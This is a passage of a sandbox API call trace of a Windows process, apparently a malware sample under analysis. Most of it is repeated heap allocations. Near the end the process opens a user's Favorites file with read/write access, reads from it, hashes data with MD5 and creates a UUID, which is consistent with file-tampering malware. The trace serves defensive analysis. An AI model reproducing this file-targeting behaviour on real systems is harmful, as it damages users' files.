hFindFile=0x31c7500) returned 1 [0096.548] HeapFree (in: hHeap=0x680000, dwFlags=0x0, lpMem=0x31c3f40 | out: hHeap=0x680000) returned 1 [0096.548] HeapFree (in: hHeap=0x680000, dwFlags=0x0, lpMem=0x99e3da8 | out: hHeap=0x680000) returned 1 [0096.548] PeekMessageW (in: lpMsg=0x9ccff08, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x9ccff08) returned 0 [0096.548] RtlAllocateHeap (HeapHandle=0x680000, Flags=0x0, Size=0x70) returned 0x99e3da8 [0096.548] PeekMessageW (in: lpMsg=0x9ccfb74, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x9ccfb74) returned 0 [0096.548] RtlAllocateHeap (HeapHandle=0x680000, Flags=0x0, Size=0x70) returned 0x99e3c40 [0096.548] RtlAllocateHeap (HeapHandle=0x680000, Flags=0x0, Size=0x820) returned 0x99c9c68 [0096.549] HeapFree (in: hHeap=0x680000, dwFlags=0x0, lpMem=0x99c9c68 | out: hHeap=0x680000) returned 1 [0096.549] HeapFree (in: hHeap=0x680000, dwFlags=0x0, lpMem=0x99e3c40 | out: hHeap=0x680000) returned 1 [0096.549] RtlAllocateHeap (HeapHandle=0x680000, Flags=0x0, Size=0x70) returned 0x99e3c40 [0096.549] RtlAllocateHeap (HeapHandle=0x680000, Flags=0x0, Size=0x830) returned 0x99c9c68 [0096.549] HeapFree (in: hHeap=0x680000, dwFlags=0x0, lpMem=0x99c9c68 | out: hHeap=0x680000) returned 1 [0096.549] HeapFree (in: hHeap=0x680000, dwFlags=0x0, lpMem=0x99e3c40 | out: hHeap=0x680000) returned 1 [0096.549] RtlAllocateHeap (HeapHandle=0x680000, Flags=0x0, Size=0x70) returned 0x99e3c40 [0096.549] RtlAllocateHeap (HeapHandle=0x680000, Flags=0x0, Size=0x830) returned 0x99c9c68 [0096.549] HeapFree (in: hHeap=0x680000, dwFlags=0x0, lpMem=0x99c9c68 | out: hHeap=0x680000) returned 1 [0096.549] HeapFree (in: hHeap=0x680000, dwFlags=0x0, lpMem=0x99e3c40 | out: hHeap=0x680000) returned 1 [0096.549] RtlAllocateHeap (HeapHandle=0x680000, Flags=0x0, Size=0x70) returned 0x99e3c40 [0096.549] RtlAllocateHeap (HeapHandle=0x680000, Flags=0x0, Size=0x830) returned 0x99c9c68 [0096.549] HeapFree (in: hHeap=0x680000, dwFlags=0x0, lpMem=0x99c9c68 | out: hHeap=0x680000) returned 1 [0096.549] HeapFree (in: hHeap=0x680000, dwFlags=0x0, lpMem=0x99e3c40 | out: hHeap=0x680000) returned 1 [0096.550] RtlAllocateHeap (HeapHandle=0x680000, Flags=0x0, Size=0x70) returned 0x99e3c40 [0096.550] RtlAllocateHeap (HeapHandle=0x680000, Flags=0x0, Size=0x830) returned 0x99c9c68 [0096.550] HeapFree (in: hHeap=0x680000, dwFlags=0x0, lpMem=0x99c9c68 | out: hHeap=0x680000) returned 1 [0096.550] HeapFree (in: hHeap=0x680000, dwFlags=0x0, lpMem=0x99e3c40 | out: hHeap=0x680000) returned 1 [0096.550] RtlAllocateHeap (HeapHandle=0x680000, Flags=0x0, Size=0x70) returned 0x99e3c40 [0096.550] RtlAllocateHeap (HeapHandle=0x680000, Flags=0x0, Size=0x840) returned 0x99c9c68 [0096.550] HeapFree (in: hHeap=0x680000, dwFlags=0x0, lpMem=0x99c9c68 | out: hHeap=0x680000) returned 1 [0096.550] HeapFree (in: hHeap=0x680000, dwFlags=0x0, lpMem=0x99e3c40 | out: hHeap=0x680000) returned 1 [0096.550] RtlAllocateHeap (HeapHandle=0x680000, Flags=0x0, Size=0x70) returned 0x99e3c40 [0096.550] RtlAllocateHeap (HeapHandle=0x680000, Flags=0x0, Size=0x820) returned 0x99c9c68 [0096.550] RtlAllocateHeap (HeapHandle=0x680000, Flags=0x0, Size=0xc2e) returned 0x99f25a8 [0096.550] HeapFree (in: hHeap=0x680000, dwFlags=0x0, lpMem=0x99c9c68 | out: hHeap=0x680000) returned 1 [0096.550] HeapFree (in: hHeap=0x680000, dwFlags=0x0, lpMem=0x99f25a8 | out: hHeap=0x680000) returned 1 [0096.550] HeapFree (in: hHeap=0x680000, dwFlags=0x0, lpMem=0x99e3c40 | out: hHeap=0x680000) returned 1 [0096.551] RtlAllocateHeap (HeapHandle=0x680000, Flags=0x0, Size=0x70) returned 0x99e3c40 [0096.551] RtlAllocateHeap (HeapHandle=0x680000, Flags=0x0, Size=0x820) returned 0x99c9c68 [0096.551] HeapFree (in: hHeap=0x680000, dwFlags=0x0, lpMem=0x99c9c68 | out: hHeap=0x680000) returned 1 [0096.551] HeapFree (in: hHeap=0x680000, dwFlags=0x0, lpMem=0x99e3c40 | out: hHeap=0x680000) returned 1 [0096.551] RtlAllocateHeap (HeapHandle=0x680000, Flags=0x0, Size=0x70) returned 0x99e3c40 [0096.551] RtlAllocateHeap (HeapHandle=0x680000, Flags=0x0, Size=0x840) returned 0x99c9c68 [0096.551] HeapFree (in: hHeap=0x680000, dwFlags=0x0, lpMem=0x99c9c68 | out: hHeap=0x680000) returned 1 [0096.551] HeapFree (in: hHeap=0x680000, dwFlags=0x0, lpMem=0x99e3c40 | out: hHeap=0x680000) returned 1 [0096.551] RtlAllocateHeap (HeapHandle=0x680000, Flags=0x0, Size=0x70) returned 0x99e3c40 [0096.551] RtlAllocateHeap (HeapHandle=0x680000, Flags=0x0, Size=0x860) returned 0x31cf750 [0096.551] HeapFree (in: hHeap=0x680000, dwFlags=0x0, lpMem=0x31cf750 | out: hHeap=0x680000) returned 1 [0096.551] HeapFree (in: hHeap=0x680000, dwFlags=0x0, lpMem=0x99e3c40 | out: hHeap=0x680000) returned 1 [0096.551] RtlAllocateHeap (HeapHandle=0x680000, Flags=0x0, Size=0x70) returned 0x99e3c40 [0096.552] RtlAllocateHeap (HeapHandle=0x680000, Flags=0x0, Size=0x860) returned 0x31cf750 [0096.552] HeapFree (in: hHeap=0x680000, dwFlags=0x0, lpMem=0x31cf750 | out: hHeap=0x680000) returned 1 [0096.552] HeapFree (in: hHeap=0x680000, dwFlags=0x0, lpMem=0x99e3c40 | out: hHeap=0x680000) returned 1 [0096.552] RtlAllocateHeap (HeapHandle=0x680000, Flags=0x0, Size=0x70) returned 0x99e3c40 [0096.552] RtlAllocateHeap (HeapHandle=0x680000, Flags=0x0, Size=0x820) returned 0x99c9c68 [0096.552] HeapFree (in: hHeap=0x680000, dwFlags=0x0, lpMem=0x99c9c68 | out: hHeap=0x680000) returned 1 [0096.552] HeapFree (in: hHeap=0x680000, dwFlags=0x0, lpMem=0x99e3c40 | out: hHeap=0x680000) returned 1 [0096.552] RtlAllocateHeap (HeapHandle=0x680000, Flags=0x0, Size=0x70) returned 0x99e3c40 [0096.552] RtlAllocateHeap (HeapHandle=0x680000, Flags=0x0, Size=0x820) returned 0x99c9c68 [0096.552] HeapFree (in: hHeap=0x680000, dwFlags=0x0, lpMem=0x99c9c68 | out: hHeap=0x680000) returned 1 [0096.552] HeapFree (in: hHeap=0x680000, dwFlags=0x0, lpMem=0x99e3c40 | out: hHeap=0x680000) returned 1 [0096.552] RtlAllocateHeap (HeapHandle=0x680000, Flags=0x0, Size=0x70) returned 0x99e3c40 [0096.552] RtlAllocateHeap (HeapHandle=0x680000, Flags=0x0, Size=0x840) returned 0x99c9c68 [0096.553] HeapFree (in: hHeap=0x680000, dwFlags=0x0, lpMem=0x99c9c68 | out: hHeap=0x680000) returned 1 [0096.553] HeapFree (in: hHeap=0x680000, dwFlags=0x0, lpMem=0x99e3c40 | out: hHeap=0x680000) returned 1 [0096.553] RtlAllocateHeap (HeapHandle=0x680000, Flags=0x0, Size=0x70) returned 0x99e3c40 [0096.553] RtlAllocateHeap (HeapHandle=0x680000, Flags=0x0, Size=0x840) returned 0x99c9c68 [0096.553] HeapFree (in: hHeap=0x680000, dwFlags=0x0, lpMem=0x99c9c68 | out: hHeap=0x680000) returned 1 [0096.553] HeapFree (in: hHeap=0x680000, dwFlags=0x0, lpMem=0x99e3c40 | out: hHeap=0x680000) returned 1 [0096.553] RtlAllocateHeap (HeapHandle=0x680000, Flags=0x0, Size=0x70) returned 0x99e3c40 [0096.553] RtlAllocateHeap (HeapHandle=0x680000, Flags=0x0, Size=0x830) returned 0x99c9c68 [0096.553] HeapFree (in: hHeap=0x680000, dwFlags=0x0, lpMem=0x99c9c68 | out: hHeap=0x680000) returned 1 [0096.553] HeapFree (in: hHeap=0x680000, dwFlags=0x0, lpMem=0x99e3c40 | out: hHeap=0x680000) returned 1 [0096.553] RtlAllocateHeap (HeapHandle=0x680000, Flags=0x0, Size=0x70) returned 0x99e3c40 [0096.553] RtlAllocateHeap (HeapHandle=0x680000, Flags=0x0, Size=0x830) returned 0x99c9c68 [0096.553] HeapFree (in: hHeap=0x680000, dwFlags=0x0, lpMem=0x99c9c68 | out: hHeap=0x680000) returned 1 [0096.553] HeapFree (in: hHeap=0x680000, dwFlags=0x0, lpMem=0x99e3c40 | out: hHeap=0x680000) returned 1 [0096.553] RtlAllocateHeap (HeapHandle=0x680000, Flags=0x0, Size=0x70) returned 0x99e3c40 [0096.553] RtlAllocateHeap (HeapHandle=0x680000, Flags=0x0, Size=0x830) returned 0x99c9c68 [0096.554] HeapFree (in: hHeap=0x680000, dwFlags=0x0, lpMem=0x99c9c68 | out: hHeap=0x680000) returned 1 [0096.554] HeapFree (in: hHeap=0x680000, dwFlags=0x0, lpMem=0x99e3c40 | out: hHeap=0x680000) returned 1 [0096.554] RtlAllocateHeap (HeapHandle=0x680000, Flags=0x0, Size=0x70) returned 0x99e3c40 [0096.554] RtlAllocateHeap (HeapHandle=0x680000, Flags=0x0, Size=0x820) returned 0x99c9c68 [0096.554] HeapFree (in: hHeap=0x680000, dwFlags=0x0, lpMem=0x99c9c68 | out: hHeap=0x680000) returned 1 [0096.554] HeapFree (in: hHeap=0x680000, dwFlags=0x0, lpMem=0x99e3c40 | out: hHeap=0x680000) returned 1 [0096.554] RtlAllocateHeap (HeapHandle=0x680000, Flags=0x0, Size=0x70) returned 0x99e3c40 [0096.554] RtlAllocateHeap (HeapHandle=0x680000, Flags=0x0, Size=0x820) returned 0x99c9c68 [0096.554] HeapFree (in: hHeap=0x680000, dwFlags=0x0, lpMem=0x99c9c68 | out: hHeap=0x680000) returned 1 [0096.554] HeapFree (in: hHeap=0x680000, dwFlags=0x0, lpMem=0x99e3c40 | out: hHeap=0x680000) returned 1 [0096.554] RtlAllocateHeap (HeapHandle=0x680000, Flags=0x0, Size=0x70) returned 0x99e3c40 [0096.554] RtlAllocateHeap (HeapHandle=0x680000, Flags=0x0, Size=0x820) returned 0x99c9c68 [0096.554] HeapFree (in: hHeap=0x680000, dwFlags=0x0, lpMem=0x99c9c68 | out: hHeap=0x680000) returned 1 [0096.554] HeapFree (in: hHeap=0x680000, dwFlags=0x0, lpMem=0x99e3c40 | out: hHeap=0x680000) returned 1 [0096.554] RtlAllocateHeap (HeapHandle=0x680000, Flags=0x0, Size=0x70) returned 0x99e3c40 [0096.554] RtlAllocateHeap (HeapHandle=0x680000, Flags=0x0, Size=0x830) returned 0x99c9c68 [0096.554] HeapFree (in: hHeap=0x680000, dwFlags=0x0, lpMem=0x99c9c68 | out: hHeap=0x680000) returned 1 [0096.554] HeapFree (in: hHeap=0x680000, dwFlags=0x0, lpMem=0x99e3c40 | out: hHeap=0x680000) returned 1 [0096.554] RtlAllocateHeap (HeapHandle=0x680000, Flags=0x0, Size=0x70) returned 0x99e3c40 [0096.554] RtlAllocateHeap (HeapHandle=0x680000, Flags=0x0, Size=0x830) returned 0x99c9c68 [0096.554] RtlAllocateHeap (HeapHandle=0x680000, Flags=0x0, Size=0xc46) returned 0x99f25a8 [0096.554] HeapFree (in: hHeap=0x680000, dwFlags=0x0, lpMem=0x99c9c68 | out: hHeap=0x680000) returned 1 [0096.554] HeapFree (in: hHeap=0x680000, dwFlags=0x0, lpMem=0x99f25a8 | out: hHeap=0x680000) returned 1 [0096.554] HeapFree (in: hHeap=0x680000, dwFlags=0x0, lpMem=0x99e3c40 | out: hHeap=0x680000) returned 1 [0096.554] RtlAllocateHeap (HeapHandle=0x680000, Flags=0x0, Size=0x70) returned 0x99e3c40 [0096.554] RtlAllocateHeap (HeapHandle=0x680000, Flags=0x0, Size=0x820) returned 0x99c9c68 [0096.555] HeapFree (in: hHeap=0x680000, dwFlags=0x0, lpMem=0x99c9c68 | out: hHeap=0x680000) returned 1 [0096.555] HeapFree (in: hHeap=0x680000, dwFlags=0x0, lpMem=0x99e3c40 | out: hHeap=0x680000) returned 1 [0096.555] RtlAllocateHeap (HeapHandle=0x680000, Flags=0x0, Size=0x70) returned 0x99e3c40 [0096.555] RtlAllocateHeap (HeapHandle=0x680000, Flags=0x0, Size=0x820) returned 0x99c9c68 [0096.555] RtlAllocateHeap (HeapHandle=0x680000, Flags=0x0, Size=0xc2e) returned 0x99f25a8 [0096.555] HeapFree (in: hHeap=0x680000, dwFlags=0x0, lpMem=0x99c9c68 | out: hHeap=0x680000) returned 1 [0096.555] HeapFree (in: hHeap=0x680000, dwFlags=0x0, lpMem=0x99f25a8 | out: hHeap=0x680000) returned 1 [0096.555] HeapFree (in: hHeap=0x680000, dwFlags=0x0, lpMem=0x99e3c40 | out: hHeap=0x680000) returned 1 [0096.555] RtlAllocateHeap (HeapHandle=0x680000, Flags=0x0, Size=0x70) returned 0x99e3c40 [0096.555] RtlAllocateHeap (HeapHandle=0x680000, Flags=0x0, Size=0x860) returned 0x31cf750 [0096.555] HeapFree (in: hHeap=0x680000, dwFlags=0x0, lpMem=0x31cf750 | out: hHeap=0x680000) returned 1 [0096.555] HeapFree (in: hHeap=0x680000, dwFlags=0x0, lpMem=0x99e3c40 | out: hHeap=0x680000) returned 1 [0096.555] RtlAllocateHeap (HeapHandle=0x680000, Flags=0x0, Size=0x70) returned 0x99e3c40 [0096.555] RtlAllocateHeap (HeapHandle=0x680000, Flags=0x0, Size=0x860) returned 0x31cf750 [0096.555] HeapFree (in: hHeap=0x680000, dwFlags=0x0, lpMem=0x31cf750 | out: hHeap=0x680000) returned 1 [0096.555] HeapFree (in: hHeap=0x680000, dwFlags=0x0, lpMem=0x99e3c40 | out: hHeap=0x680000) returned 1 [0096.555] RtlAllocateHeap (HeapHandle=0x680000, Flags=0x0, Size=0x70) returned 0x99e3c40 [0096.555] RtlAllocateHeap (HeapHandle=0x680000, Flags=0x0, Size=0x820) returned 0x99c9c68 [0096.555] HeapFree (in: hHeap=0x680000, dwFlags=0x0, lpMem=0x99c9c68 | out: hHeap=0x680000) returned 1 [0096.555] HeapFree (in: hHeap=0x680000, dwFlags=0x0, lpMem=0x99e3c40 | out: hHeap=0x680000) returned 1 [0096.555] RtlAllocateHeap (HeapHandle=0x680000, Flags=0x0, Size=0x70) returned 0x99e3c40 [0096.555] RtlAllocateHeap (HeapHandle=0x680000, Flags=0x0, Size=0x820) returned 0x99c9c68 [0096.555] HeapFree (in: hHeap=0x680000, dwFlags=0x0, lpMem=0x99c9c68 | out: hHeap=0x680000) returned 1 [0096.555] HeapFree (in: hHeap=0x680000, dwFlags=0x0, lpMem=0x99e3c40 | out: hHeap=0x680000) returned 1 [0096.555] RtlAllocateHeap (HeapHandle=0x680000, Flags=0x0, Size=0x70) returned 0x99e3c40 [0096.555] RtlAllocateHeap (HeapHandle=0x680000, Flags=0x0, Size=0x830) returned 0x99c9c68 [0096.555] RtlAllocateHeap (HeapHandle=0x680000, Flags=0x0, Size=0xc46) returned 0x99f25a8 [0096.555] HeapFree (in: hHeap=0x680000, dwFlags=0x0, lpMem=0x99c9c68 | out: hHeap=0x680000) returned 1 [0096.555] HeapFree (in: hHeap=0x680000, dwFlags=0x0, lpMem=0x99f25a8 | out: hHeap=0x680000) returned 1 [0096.555] HeapFree (in: hHeap=0x680000, dwFlags=0x0, lpMem=0x99e3c40 | out: hHeap=0x680000) returned 1 [0096.556] RtlAllocateHeap (HeapHandle=0x680000, Flags=0x0, Size=0x70) returned 0x99e3c40 [0096.556] RtlAllocateHeap (HeapHandle=0x680000, Flags=0x0, Size=0x840) returned 0x99c9c68 [0096.556] HeapFree (in: hHeap=0x680000, dwFlags=0x0, lpMem=0x99c9c68 | out: hHeap=0x680000) returned 1 [0096.556] HeapFree (in: hHeap=0x680000, dwFlags=0x0, lpMem=0x99e3c40 | out: hHeap=0x680000) returned 1 [0096.556] RtlAllocateHeap (HeapHandle=0x680000, Flags=0x0, Size=0x70) returned 0x99e3c40 [0096.556] RtlAllocateHeap (HeapHandle=0x680000, Flags=0x0, Size=0x840) returned 0x99c9c68 [0096.556] HeapFree (in: hHeap=0x680000, dwFlags=0x0, lpMem=0x99c9c68 | out: hHeap=0x680000) returned 1 [0096.556] HeapFree (in: hHeap=0x680000, dwFlags=0x0, lpMem=0x99e3c40 | out: hHeap=0x680000) returned 1 [0096.556] RtlAllocateHeap (HeapHandle=0x680000, Flags=0x0, Size=0x70) returned 0x99e3c40 [0096.556] RtlAllocateHeap (HeapHandle=0x680000, Flags=0x0, Size=0x830) returned 0x99c9c68 [0096.556] HeapFree (in: hHeap=0x680000, dwFlags=0x0, lpMem=0x99c9c68 | out: hHeap=0x680000) returned 1 [0096.556] HeapFree (in: hHeap=0x680000, dwFlags=0x0, lpMem=0x99e3c40 | out: hHeap=0x680000) returned 1 [0096.556] RtlAllocateHeap (HeapHandle=0x680000, Flags=0x0, Size=0x70) returned 0x99e3c40 [0096.556] PathFindFileNameW (pszPath="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Favorites\\Windows Live\\") returned="Windows Live\\" [0096.556] PathFindFileNameW (pszPath="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Favorites\\") returned="Favorites\\" [0096.556] PathFindFileNameW (pszPath="C:\\Users\\5p5NrGJn0jS HALPmcxz\\") returned="5p5NrGJn0jS HALPmcxz\\" [0096.556] PathFindFileNameW (pszPath="C:\\Users\\") returned="Users\\" [0096.556] HeapFree (in: hHeap=0x680000, dwFlags=0x0, lpMem=0x31ef928 | out: hHeap=0x680000) returned 1 [0096.556] PathFindFileNameW (pszPath="C:\\") returned="C:\\" [0096.557] PathFindFileNameW (pszPath="") returned="" [0096.558] PathFindExtensionW (pszPath="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Favorites\\Windows Live\\Get Windows Live.url") returned=".url" [0096.558] CreateFileW (lpFileName="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Favorites\\Windows Live\\Get Windows Live.url" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\favorites\\windows live\\get windows live.url"), dwDesiredAccess=0xc0000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x6a8 [0096.559] GetFileSizeEx (in: hFile=0x6a8, lpFileSize=0x9ccfb40 | out: lpFileSize=0x9ccfb40*=133) returned 1 [0096.559] VirtualAlloc (lpAddress=0x0, dwSize=0x25815, flAllocationType=0x1000, flProtect=0x4) returned 0x3750000 [0096.562] SetFilePointerEx (in: hFile=0x6a8, liDistanceToMove=0x5f, lpNewFilePointer=0x0, dwMoveMethod=0x0 | out: lpNewFilePointer=0x0) returned 1 [0096.562] ReadFile (in: hFile=0x6a8, lpBuffer=0x3750000, nNumberOfBytesToRead=0x26, lpNumberOfBytesRead=0x9ccfb78, lpOverlapped=0x0 | out: lpBuffer=0x3750000*, lpNumberOfBytesRead=0x9ccfb78*=0x26, lpOverlapped=0x0) returned 1 [0096.563] CryptAcquireContextW (in: phProv=0x9ccfa50, szContainer=0x0, szProvider=0x0, dwProvType=0x1, dwFlags=0xf0000000 | out: phProv=0x9ccfa50*=0x6df1a0) returned 1 [0096.564] CryptCreateHash (in: hProv=0x6df1a0, Algid=0x8003, hKey=0x0, dwFlags=0x0, phHash=0x9ccfa58 | out: phHash=0x9ccfa58) returned 1 [0096.564] CryptHashData (hHash=0x31c7580, pbData=0x31d5100, dwDataLen=0x1f1, dwFlags=0x0) returned 1 [0096.564] CryptGetHashParam (in: hHash=0x31c7580, dwParam=0x2, pbData=0x0, pdwDataLen=0x9ccfa54, dwFlags=0x0 | out: pbData=0x0, pdwDataLen=0x9ccfa54) returned 1 [0096.564] CryptGetHashParam (in: hHash=0x31c7580, dwParam=0x2, pbData=0x314d0e8, pdwDataLen=0x9ccfa54, dwFlags=0x0 | out: pbData=0x314d0e8, pdwDataLen=0x9ccfa54) returned 1 [0096.564] GetLastError () returned 0x0 [0096.564] CryptDestroyHash (hHash=0x31c7580) returned 1 [0096.564] CryptReleaseContext (hProv=0x6df1a0, dwFlags=0x0) returned 1 [0096.564] HeapFree (in: hHeap=0x680000, dwFlags=0x0, lpMem=0x31d5100 | out: hHeap=0x680000) returned 1 [0096.564] UuidCreate (in: Uuid=0x9ccfa48 | out: Uuid=0x9ccfa48) returned 0x0 [0096.564] UuidToStringA (in: Uuid=0x9ccfa48, StringUuid=0x9ccfa40 | out: StringUuid=0x9ccfa40) returned 0x0 [0096.564] RtlAllocateHeap (HeapHandle=0x680000, Flags=0x0, Size=0x30) returned 0x31c3fb0 [0096.564] RpcStringFreeA (in: String=0x9ccfa40 | out: String=0x9ccfa40) returned 0x0 [0096.564] HeapFree (in: hHeap=0x680000, dwFlags=0x0, lpMem=0x31c3fe8 | out: hHeap=0x680000) returned 1 [0096.564] RtlAllocateHeap (HeapHandle=0x680000, Flags=0x0, Size=0x30) returned 0x31c3fe8 [0096.564] RtlAllocateHeap (HeapHandle=0x680000, Flags=0x0, Size=0x90) returned 0x31b3ff8 [0096.564] SetFilePointer (in: hFile=0x6a8, lDistanceToMove=5, lpDistanceToMoveHigh=0x0, dwMoveMethod=0x0 | out: lpDistanceToMoveHigh=0x0) returned 0x5 [0096.565] HeapFree (in: hHeap=0x680000, dwFlags=0x0, lpMem=0x31c3fb0 | out: hHeap=0x680000) returned 1 [0096.565] RtlAllocateHeap (HeapHandle=0x680000, Flags=0x0, Size=0x1f0) returned 0x99e1970 [0096.565] RtlAllocateHeap (HeapHandle=0x680000, Flags=0x0, Size=0x30) returned 0x31c3fb0 [0096.565] RtlAllocateHeap (HeapHandle=0x680000, Flags=0x0, Size=0x1f0) returned 0x99e1b68 [0096.565] RtlAllocateHeap (HeapHandle=0x680000, Flags=0x0, Size=0x58) returned 0x99d9e08 [0096.565] RtlAllocateHeap (HeapHandle=0x680000, Flags=0x0, Size=0x40) returned 0x9a029d8 [0096.565] RtlAllocateHeap (HeapHandle=0x680000, Flags=0x0, Size=0xc) returned 0x99e4988 [0096.565] RtlAllocateHeap (HeapHandle=0x680000, Flags=0x0, Size=0x40) returned 0x9a02a20 [0096.565] RtlAllocateHeap (HeapHandle=0x680000, Flags=0x0, Size=0xc) returned 0x99e49a0 [0096.565] RtlAllocateHeap (HeapHandle=0x680000, Flags=0x0, Size=0xc) returned 0x99e49b8 [0096.565] RtlAllocateHeap (HeapHandle=0x680000, Flags=0x0, Size=0xc) returned 0x99e49d0 [0096.565] RtlAllocateHeap (HeapHandle=0x680000, Flags=0x0, Size=0xc) returned 0x99e49e8 [0096.565] RtlAllocateHeap (HeapHandle=0x680000, Flags=0x0, Size=0x24) returned 0x31d4940 [0096.565] RtlAllocateHeap (HeapHandle=0x680000, Flags=0x0, Size=0x158) returned 0x9a04a18 [0096.565] RtlReAllocateHeap (Heap=0x680000, Flags=0x0, Ptr=0x9a04a18, Size=0x218) returned 0x99e9300 [0096.565] RtlAllocateHeap (HeapHandle=0x680000, Flags=0x0, Size=0x558) returned 0x9a04420 [0096.565] HeapFree (in: hHeap=0x680000, dwFlags=0x0, lpMem=0x99e49b8 | out: hHeap=0x680000) returned 1 [0096.565] HeapFree (in: hHeap=0x680000, dwFlags=0x0, lpMem=0x99e49e8 | out: hHeap=0x680000) returned 1 [0096.565] HeapFree (in: hHeap=0x680000, dwFlags=0x0, lpMem=0x99e49d0 | out: hHeap=0x680000) returned 1 [0096.565] HeapFree (in: hHeap=0x680000, dwFlags=0x0, lpMem=0x31d4940 | out: hHeap=0x680000) returned 1 [0096.565] HeapFree (in: hHeap=0x680000, dwFlags=0x0, lpMem=0x9a04420 | out: hHeap=0x680000) returned 1 [0096.565] RtlAllocateHeap (HeapHandle=0x680000, Flags=0x0, Size=0xc) returned 0x99e49d0 [0096.565] RtlAllocateHeap (HeapHandle=0x680000, Flags=0x0, Size=0x8) returned 0x316e958 [0096.565] RtlAllocateHeap (HeapHandle=0x680000, Flags=0x0, Size=0x10) returned 0x99e49e8 [0096.565] RtlAllocateHeap (HeapHandle=0x680000, Flags=0x0, Size=0x18) returned 0x314d0a8 [0096.565] RtlAllocateHeap (HeapHandle=0x680000, Flags=0x0, Size=0x9) returned 0x99e49b8 [0096.565] RtlAllocateHeap (HeapHandle=0x680000, Flags=0x0, Size=0x8) returned 0x316e998 [0096.565] RtlAllocateHeap (HeapHandle=0x680000, Flags=0x0, Size=0x10e) returned 0x31b6350 [0096.565] RtlAllocateHeap (HeapHandle=0x680000, Flags=0x0, Size=0x20) returned 0x31ef928 [0096.565] RtlAllocateHeap (HeapHandle=0x680000, Flags=0x0, Size=0x58) returned 0x99d9d48 [0096.565] RtlAllocateHeap (HeapHandle=0x680000, Flags=0x0, Size=0x14) returned 0x314d0e8 [0096.565] RtlAllocateHeap (HeapHandle=0x680000, Flags=0x0, Size=0x104) returned 0x31919a8 [0096.565] RtlAllocateHeap (HeapHandle=0x680000, Flags=0x0, Size=0x14) returned 0x314df08 [0096.566] RtlAllocateHeap (HeapHandle=0x680000, Flags=0x0, Size=0x4) returned 0x316e948 [0096.566] HeapFree (in: hHeap=0x680000, dwFlags=0x0, lpMem=0x31b6350 | out: hHeap=0x680000) returned 1 [0096.566] HeapFree (in: hHeap=0x680000, dwFlags=0x0, lpMem=0x99e49e8 | out: hHeap=0x680000) returned 1 [0096.566] HeapFree (in: hHeap=0x680000, dwFlags=0x0, lpMem=0x316e998 | out: hHeap=0x680000) returned 1 [0096.566] HeapFree (in: hHeap=0x680000, dwFlags=0x0, lpMem=0x99e49b8 | out: hHeap=0x680000) returned 1 [0096.566] HeapFree (in: hHeap=0x680000, dwFlags=0x0, lpMem=0x314d0a8 | out: hHeap=0x680000) returned 1 [0096.566] HeapFree (in: hHeap=0x680000, dwFlags=0x0, lpMem=0x316e958 | out: hHeap=0x680000) returned 1 [0096.566] HeapFree (in: hHeap=0x680000, dwFlags=0x0, lpMem=0x99e49d0 | out: hHeap=0x680000) returned 1 [0096.566] HeapFree (in: hHeap=0x680000, dwFlags=0x0, lpMem=0x31ef928 | out: hHeap=0x680000) returned 1 [0096.566] HeapFree (in: hHeap=0x680000, dwFlags=0x0, lpMem=0x99d9e08 | out: hHeap=0x680000) returned 1 [0096.566] HeapFree (in: hHeap=0x680000, dwFlags=0x0, lpMem=0x99e9300 | out: hHeap=0x680000) returned 1 [0096.566] GetCurrentThreadId () returned 0x8c4 [0096.566] RtlAllocateHeap (HeapHandle=0x680000, Flags=0x0, Size=0x100) returned 0x99def60 [0096.566] RtlAllocateHeap (HeapHandle=0x680000, Flags=0x0, Size=0x82) returned 0x99f8100 [0096.566] RtlAllocateHeap (HeapHandle=0x680000, Flags=0x0, Size=0x2c) returned 0x31c3f78 [0096.566] RtlAllocateHeap (HeapHandle=0x680000, Flags=0x0, Size=0x80) returned 0x6df1a0 [0096.566] RtlAllocateHeap (HeapHandle=0x680000, Flags=0x0, Size=0x148) returned 0x31ce620 [0096.566] RtlAllocateHeap (HeapHandle=0x680000, Flags=0x0, Size=0x4) returned 0x316e958 [0096.566] RtlAllocateHeap (HeapHandle=0x680000, Flags=0x0, Size=0x4) returned 0x316e998 [0096.566] RtlAllocateHeap (HeapHandle=0x680000, Flags=0x0, Size=0x100) returned 0x99df068 [0096.566] RtlAllocateHeap (HeapHandle=0x680000, Flags=0x0, Size=0x64) returned 0x751ab8 [0096.566] HeapFree (in: hHeap=0x680000, dwFlags=0x0, lpMem=0x751ab8 | out: hHeap=0x680000) returned 1 [0096.566] GetCurrentThreadId () returned 0x8c4 [0096.566] RtlAllocateHeap (HeapHandle=0x680000, Flags=0x0, Size=0x64) returned 0x751ab8 [0096.566] HeapFree (in: hHeap=0x680000, dwFlags=0x0, lpMem=0x751ab8 | out: hHeap=0x680000) returned 1 [0096.566] RtlAllocateHeap (HeapHandle=0x680000, Flags=0x0, Size=0xeb) returned 0x9a03438 [0096.566] RtlAllocateHeap (HeapHandle=0x680000, Flags=0x0, Size=0x64) returned 0x751ab8 [0096.566] HeapFree (in: hHeap=0x680000, dwFlags=0x0, lpMem=0x751ab8 | out: hHeap=0x680000) returned 1 [0096.566] RtlAllocateHeap (HeapHandle=0x680000, Flags=0x0, Size=0x64) returned 0x751ab8 [0096.566] HeapFree (in: hHeap=0x680000, dwFlags=0x0, lpMem=0x751ab8 | out: hHeap=0x680000) returned 1 [0096.566] HeapFree (in: hHeap=0x680000, dwFlags=0x0, lpMem=0x9a03438 | out: hHeap=0x680000) returned 1 [0096.566] RtlAllocateHeap (HeapHandle=0x680000, Flags=0x0, Size=0x100) returned 0x99deb40 [0096.566] HeapFree (in: hHeap=0x680000, dwFlags=0x0, lpMem=0x316e958 | out: hHeap=0x680000) returned 1 [0096.566] RtlAllocateHeap (HeapHandle=0x680000, Flags=0x0, Size=0x4c) returned 0x31cb988 [0096.567] RtlAllocateHeap (HeapHandle=0x680000, Flags=0x0, Size=0x4) returned 0x316e958 [0096.567] RtlAllocateHeap (HeapHandle=0x680000, Flags=0x0, Size=0x100) returned 0x99ded50 [0096.567] RtlAllocateHeap (HeapHandle=0x680000, 